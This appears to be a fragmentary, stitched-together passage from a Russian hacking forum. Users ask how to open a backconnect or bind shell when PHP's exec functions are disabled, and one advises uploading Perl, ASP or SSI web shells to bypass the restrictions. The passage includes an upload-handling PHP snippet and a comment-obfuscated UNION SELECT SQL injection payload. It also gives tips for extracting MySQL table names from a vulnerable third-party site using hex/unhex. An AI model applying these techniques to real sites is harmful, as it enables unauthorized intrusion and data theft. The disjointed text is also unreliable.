Как организовать backconnect/bind при отключенных функциях php
exec,passthru,shell_exec,system,proc_open,popen?
Если можно, подробнее.

$size = getimagesize($_FILES[$formName]['tmp_name']);
$format = strtolower(substr($size['mime'], strpos($size['mime'], '/')+1));
move_uploaded_file($_FILES[$formName]['tmp_name'], $G_Settings["DIR_IMG"]."/{$G_Settings["IMG_NAMES"]}.{$format}")

Какие еще оболочки присутствуют на серваке?
Попробуй залить Шеллы на перле,асп'е,ssi
На них уже ограничения не действуют

Обратные кавычки недоступны, в случае, если включен безопасный режим или отключена функция shell_exec().

-235/**//*!union*//**//*!select*//**/version(),2,3/**//*!from*//**/--

Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, 4564646@6456456.456 and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.

такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...
при инъекции
все ок, т.е. вывод есть
но когда пытаюсь получить имена таблиц
сайт ругается
как вытащить имена ?

А unhex(hex('xyu')) попробовать?

unhex('7461626c655f6e616d65')

пробовал - ругается. попробовал вот так
вывело тупо table_name,table_name,table_name